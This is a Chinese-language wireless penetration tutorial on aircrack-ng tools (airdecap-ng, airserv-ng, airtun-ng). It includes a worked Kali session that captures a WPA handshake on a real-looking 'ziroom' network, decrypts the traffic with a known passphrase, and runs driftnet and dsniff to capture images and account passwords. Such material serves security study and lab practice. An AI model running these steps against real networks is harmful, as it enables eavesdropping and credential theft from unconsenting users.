无线渗透（八）AIRRACK-NG SUITE

AIRDECAP-NG

去除802.11头

airdecap-ng -b <AP MAC> 1.pcap

解密WEP加密数据

airdecap-ng -w <WEP key>-b <AP MAC> 1.pcap

必须有与AP建立关联关系

解密WPA加密数据

airdecap-ng -e kifi -p <PSK> -b <AP MAC> 1.pcap

抓包文件中必须包含4步握手信息，否则无解

root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill

Killing these processes:

PID Name

875 wpa_supplicant

1580 dhclient

root@kali:~# airmon-ng start wlan2

No interfering processes found

PHY Interface Dirver Chipset

phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)

(mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# airodump-ng wlan0mon

CH 1 ][ Elapsed: 18 s ][ 2019-03-09 05:20

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

D8:B0:4C:C3:25:E0 -68 7 0 0 11 65 WPA2 CCMP PSK <length

D4:EE:07:67:22:90 -75 9 2 0 8 270 WPA2 CCMP PSK ziroom4

D0:76:E7:51:2A:78 -83 7 0 0 1 270 WPA2 CCMP PSK ziroom5

40:31:3C:FD:BE:D2 -86 5 0 0 1 130 WPA2 CCMP PSK Xiaomi_

BSSID STATION PWR Rate Lost Frames Probe

D4:EE:07:67:22:90 20:16:B9:33:38:F3 -1 2e- 0 0 2

root@kali:~# airodump-ng wlan0mon –bssid D4:EE:07:67:22:90 -c 8 -w TP-01

CH 8 ][ Elapsed: 2 mins ][ 2019-03-09 05:25 ][ WPA handshake: D4:EE:07:67:22:90

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESS

D4:EE:07:67:22:90 -69 2 1123 13256 172 8 270 WPA2 CCMP PSK zir

BSSID STATION PWR Rate Lost Frames Probe

D4:EE:07:67:22:90 70:8A:09:9A:01:C4 -1 2e- 0 0 6

D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -28 0e- 1e 2 13189

D4:EE:07:67:22:90 20:16:B9:33:38:F3 -32 2e- 6e 0 196

D4:EE:07:67:22:90 DC:F0:90:8B:A1:A6 -62 0e- 6 0 31

D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -84 2e- 6 0 17

D4:EE:07:67:22:90 5C:F5:DA:E2:35:A6 -90 2e- 1 0 5

root@kali:~# wireshark tp-01.cap

将数据包过滤出来

root@kali:~# airdecap-ng -e ziroom401 -b D4:EE:07:67:22:90 -p ziroomer TP-01-02.cap

Total number of stations seen 7

Total number of packets read 42483

Total number of WEP data packets 0

Total number of WPA data packets 12119

Number of plaintext data packets 0

Number of decrypted WEP packets 0

Number of corrupted WEP packets 0

Number of decrypted WPA packets 12019

Number of bad TKIP (WPA) packets 0

Number of bad CCMP (WPA) packets 0

# 解包在当前目录下生成dec.cap 文件

TP-01-02-dec.cap

root@kali:~# wireshark TP-01-02-dec.cap

802.11数据包被成功解密，可以查看明文信息

AIRSERV-NG

通过网络提供无线网卡服务器

某些网卡不支持客户点/服务器模式

启动无线侦听

服务器端

airserv-ng -p 3333 -d wlan2mon

客户端

airodump-ng 192.168.1.1:3333

某些防火墙会影响C/S间的通信

root@kali:~# airserv-ng -p 3333 -d wlan0mon

Opening card wlan0mon

Setting chan 1

Opening sock port 3333

Serving wlan0mon chan 1 on port 3333

root@kali:~# netstat -pantu | grep 3333

tcp 0 0 0.0.0.0:3333 0.0.0.0:* LISTEN 16702/airserv-ng

root@kali:~# airodump-ng 127.0.0.1:3333

AIRTUN-NG

无线入侵检测wIDS

无线密码和BSSID

需要获取握手信息

中继和重放

Repeate/Replay

AIRTUN-NG

wIDS

WEP: airtun-ng -a <AP MAC> -w SKA wlan2mon

WPA: airtun-ng -a <AP MAC> -p PSK -e kifi wlan2mon

ifconfig at0 up

四步握手

理论上支持多AP的wIDS,但2个AP以上时可靠性会下降

WPA: airtun-ng -a <AP MAC> -p PSK -e kifi1 wlan2mon

ifconfig at1 up

多AP不同信道时airodump -c 1,11 wlan2mon

root@kali:~# airtun-ng -a D4:EE:07:67:22:90 -p ziroomer002 -e ziroom401 wlan0mon

created tap interface at0

WPA encryption specified. Sending and receiving frames through wlan0mon.

FromDS bit set in all frames.

root@kali:~# ifconfig -a //at0

root@kali:~# ifcongif at0 up

root@kali:~# airodump-ng wlan0mon –bssid 14:75:90:21:4F:56 -c 6

root@kali:~# driftnet -i at0 //抓取图片信息

root@kali:~# dsniff -i at0 //抓取账号密码信息

root@VB:~# tcpreplay -ieth1 -M1000 ids.pcap

Sending out eth1

processing file: ids.pcap

Actual: 8497 packets (4090599 bytes) sent in 1.87 seconds

Rated: 2187486.0 bps, 16.96 Mbps, 4543.85 pps

Statistics for network device: eth1

Attempted packets: 8487

Successful packets: 8497

Failed packets: 0

Retried packets (ENOBUFS): 0

Retried packets (EAGAIN): 0